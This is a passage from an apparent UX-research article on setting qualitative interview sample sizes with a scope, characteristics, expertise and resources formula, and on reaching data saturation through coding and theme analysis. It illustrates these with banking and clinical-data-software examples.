You’ve created your questionnaire and focused on exploring how your participants have experienced banking, both in person and online, over the past five years. You spend an hour interviewing each participant, thoroughly exhausting your lines of questioning and follow-up prompts.
You collect and analyze the data simultaneously. After 12 interviews, you find that key themes have emerged from your data: a perceived lack of transparency around fees, a desire to share personal banking experiences, and gaps in the account-opening experience.
Your team meets to discuss the themes and how to apply them to your work. You decide as a team to create a concept for a web-based onboarding experience that facilitates transparency into how the bank applies fees to accounts, that addresses how the client allows users to share personal banking experiences and to invite others, and that covers key aspects of onboarding that your participants said were lacking from their account-opening experiences.
You have reached one of the two requirements for saturation: You have collected enough meaningful data to identify key themes and make recommendations. You have an actionable takeaway from your findings: to create an onboarding experience that highlights transparency and personal connections. And it only took you 12 participants to get there. You finish the last three interviews to validate what you’ve heard and to stockpile more data for the next component of saturation.
You thoroughly analyze the data you have collected to reach saturation of data analysis. This means you’ve done your due diligence in analyzing the data you’ve collected, whether the sample size is 1 or 100. You can analyze qualitative data in many ways. Some of the ways depend on the exact method of data collection you’ve followed.
You will need to code all of your data. You can create codes inductively (based on what the data tell you) or deductively (predetermined codes). You are trying to identify meaningful themes and points made in the data. You saturate data analysis when you have coded all data and identified themes supported by the coded data. This is also where the researcher’s experience comes into play. Experience will help you to identify meaningful codes and themes more quickly and to translate them into actionable recommendations.
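As a rough illustration of how coded data converges on themes, you can tally how often each code recurs across interviews. The codes and interviews below are invented for illustration, and real coding is typically done in a spreadsheet or QDA tool rather than a script:

```python
from collections import Counter

# Hypothetical inductive codes applied to quotes in each interview.
coded_interviews = [
    ["lack of transparency (fees)", "onboarding gaps"],
    ["lack of transparency (fees)", "wants personal connection"],
    ["lack of transparency (data use)", "onboarding gaps"],
]

# Count how often each code appears across all interviews.
code_counts = Counter(
    code for interview in coded_interviews for code in interview
)

# Codes that recur across interviews are candidates for themes;
# a code seen only once may warrant more focused follow-up interviews.
for code, count in code_counts.most_common():
    print(f"{code}: {count}")
```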
Going back to our banking example, you’ve presented your findings and proposed an onboarding experience to your client. The client likes the idea, but also suggests there might be more information to uncover about the lack of transparency. They suggest you find a few more people to interview about this theme specifically.
You ask another researcher to review your data before you agree to interview more people. This researcher finds variation in the transparency-themed quotes that the current codes don’t cover: Some users think banks lack transparency around fees and services. Others mention that banks lack transparency in how client information is stored and used. Initially, you only coded a lack of transparency in fee structures. The additional pair of eyes reviewing your data enables you to reach saturation of analysis. Your designers begin to account for this variation of transparency in the onboarding experience and throughout. They highlight bank privacy and data-security policies.
You have a discussion with your client and suggest not moving forward with additional interviews. You were able to reach saturation of data analysis once you reviewed the data and applied additional codes. You don’t need additional interviews.
Let’s run through a case study covering the concepts presented in this article.
Suppose we are working with a client to conceptualize a redesign of their clinical data-management application. Researchers use clinical data-management applications to collect and store data from clinical trials. Clinical trials are studies that test the effectiveness of new medical treatments. The client wants us to identify areas to improve the design of their product and to increase use and reliability. We will conduct interviews up front to inform our design concepts.
We’ll request 12 interview participants based on the formula in this article. Below is how we’ve determined the value of each variable in the formula.
Scope: We are tasked with providing research-informed design concepts for an existing product. This project does not have a large scope. We are not inventing a new way to collect clinical data, but rather are improving an existing tool. The smaller scope justifies a smaller sample size.
S = 1

Characteristics: There are 3 user types, and C = P × 3, so C = 3 × 3.

C = 9

Expertise: Let’s say our lead researcher has 10 years of research experience. Our team has experience with the type of project we are completing. We know exactly how much data we need and what to expect from interviewing 12 people.
E = 1.20

At this point, our formula gives ((1 × 9) ÷ 1.2) = 7.5 participants, before factoring in resources. We’ll round up to 8 participants.
Resources: We know the budget and time resources available. We know from past projects that we’ll have enough resources to conduct up to 15 interviews. We could divert more resources to design if we go with fewer than 15 participants. Adding 4 participants to our current number (8) won’t tax our resources and would allow us to speak to 4 of each user type.
R = 4

We recommend 12 research participants to our client, based on the formula for determining the proposed sample size:
- Scope (S): small scope, updating an existing product → S = 1
- Characteristics (C): 3 user types → C = 9
- Expertise (E): 10 years → E = 1.20
- Resources (R): fine for up to 15 total participants → R = +4
- ((S × C) ÷ E) + R
- ((1 × 9) ÷ 1.2) + 4 = 12 participants for this study (7.5, rounded up to 8, plus 4)

We’ll set up a spreadsheet to manage the data we collect. Let’s set up the spreadsheet to first examine the data, with participants in rows and the questions in columns (table 1):
| | What are some challenges with the system? | Question 2 | Question 3 | Question 4 |
|---|---|---|---|---|
| Participant 1 | Protocol deviations can get lost or be misleading because they are not always clearly displayed. This would give too much control to the study coordinator role; they would be able to change too much. A tremendous amount of cleaning needs to get done. | | | |
Next, we add a second tab to the spreadsheet and create codes based on what emerges from the data (table 2):
| | Code: Issues with study protocol (deviations) | Code: Unreliable data | Code 3 | Code 4 |
|---|---|---|---|---|
| Participant 1 | There isn’t consistency looking at the same data. It gives too much control to the study coordinator role. They would be able to change too much. | A tremendous amount of cleaning needs to get done. | | |
Next, we review the data to identify relevant themes (table 3):
| | Theme: “trust in the product” | Theme 2 | Theme 3 | Theme 4 |
|---|---|---|---|---|
| Coded quote and participant | “I’m not sure if we are compliant.” – Participant 1 | | | |
| Quote and participant | “It’s very configurable, but it’s configurable to the point that it’s unreliable and not predictable.” – Participant 2 | | | |
Trust emerges as a theme almost immediately. Nearly every participant mentions a lack of trust in the system. The study designers tell us they don’t trust the lack of structure in creating a study; the clinical data collectors tell us they don’t trust the novice study designers; and the managers tell us they don’t trust the study’s design, the accuracy of the data collectors or the ability of the system to store and upload data with 100% accuracy.
Our design recommendations for the concepts focus on interactions and functionality to increase trust in the product.
As qualitative user researchers, we must be able to support our reasons for choosing a sample size. We may not be academic researchers, but we should strive for standards in how we determine sample sizes. Standards increase the rigor and integrity of our studies. I’ve provided a formula to help justify sample sizes.
We must also make sure to achieve data saturation. We do this by suggesting a reasonable sample size, by collecting data using sound questions and good interviewing techniques, and by thoroughly analyzing the data. Clients and colleagues will appreciate the transparency we provide when we show how we’ve determined our sample size and analyzed our data.
I’ve covered a case study demonstrating use of the formula I’ve proposed for determining qualitative research sample sizes. I’ve also discussed how to analyze data in order to reach data saturation.
We must continue to move the conversation on determining qualitative sample sizes forward. Please share other ideas you’ve encountered or used to determine sample sizes. What standards have you given clients or colleagues when asked how you determined a sample size?
(cc, yk, al, il)